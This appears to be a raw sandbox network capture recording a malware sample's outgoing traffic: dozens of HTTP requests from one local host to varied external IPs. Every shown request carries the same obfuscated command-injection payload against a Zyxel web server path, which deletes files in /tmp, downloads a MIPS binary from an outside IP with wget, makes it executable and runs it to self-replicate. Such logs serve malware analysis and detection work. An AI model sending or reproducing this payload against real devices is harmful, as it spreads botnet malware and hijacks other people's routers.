                                                Jan 28, 2024 10:16:41.047516108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8368192.168.2.235101619.16.204.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.047539949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8369192.168.2.23351042.51.116.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.047548056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8370192.168.2.2333046152.73.125.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.047610044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8371192.168.2.2337370185.91.214.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.047652006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8372192.168.2.234210092.228.153.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.047702074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8373192.168.2.2341862119.220.225.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.047713041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8374192.168.2.2358626216.196.10.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.047734022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8375192.168.2.2347110192.236.95.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.047748089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8376192.168.2.234071883.124.241.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.047776937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8377192.168.2.235562086.34.108.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.047812939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8378192.168.2.2342116104.220.205.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.047856092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8379192.168.2.2342798170.16.159.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.047899008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8380192.168.2.23512145.221.207.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.047899008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8381192.168.2.2335842197.61.170.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.047926903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8382192.168.2.235392890.208.95.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.047956944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8383192.168.2.235486041.213.87.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.047985077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8384192.168.2.2351198180.225.215.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.048019886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8385192.168.2.2351644110.191.21.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.048043966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8386192.168.2.2335320174.32.205.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.048086882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8387192.168.2.235703857.100.182.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.048125982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8388192.168.2.2352998149.155.0.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.048125982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8389192.168.2.234995446.161.166.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.048170090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8390192.168.2.2350332138.95.200.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.048207998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8391192.168.2.23356464.161.106.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.048217058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8392192.168.2.233643461.199.214.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.048243046 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8393192.168.2.235886678.4.62.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.048290968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8394192.168.2.2347376102.191.40.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.048306942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8395192.168.2.2359064128.15.60.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.048333883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8396192.168.2.233440437.132.39.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.048362970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8397192.168.2.233977044.55.58.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.048382998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8398192.168.2.2340934150.94.60.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.048393965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8399192.168.2.2336640203.17.234.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.048397064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8400192.168.2.2356412201.85.80.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.048435926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8401192.168.2.2343196111.96.25.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.048487902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8402192.168.2.2357584107.86.247.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.048499107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8403192.168.2.2344350102.130.73.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.048522949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8404192.168.2.235950473.156.2.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.048542023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8405192.168.2.2333432109.205.203.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.048562050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8406192.168.2.23554649.112.7.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.048609972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8407192.168.2.2358104144.18.90.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.048648119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8408192.168.2.23450401.11.136.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.048681021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8409192.168.2.2350898148.176.252.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.048711061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8410192.168.2.2340252170.150.203.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.048717022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8411192.168.2.2358816148.133.180.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.048744917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8412192.168.2.2335638153.143.123.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.048799038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8413192.168.2.2341722147.251.154.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.048826933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8414192.168.2.234833063.88.44.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.048861980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8415192.168.2.2356354222.138.51.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.048904896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8416192.168.2.23368889.123.250.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.048904896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8417192.168.2.2351190138.131.127.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.048933983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8418192.168.2.2334536108.107.127.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.048944950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8419192.168.2.2344100110.130.130.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.048986912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8420192.168.2.235738471.148.132.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.049015999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8421192.168.2.2334774186.185.156.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.049042940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8422192.168.2.234679265.13.209.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.049084902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8423192.168.2.2350124223.187.233.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.049125910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8424192.168.2.2355788152.230.19.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.049129009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8425192.168.2.233946088.111.30.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.049165964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8426192.168.2.235266074.41.203.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.049211979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8427192.168.2.233606214.47.100.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.049225092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8428192.168.2.2335758204.128.95.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:41.049252033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8429192.168.2.2356516200.77.159.39443
                                                TimestampBytes transferredDirectionData
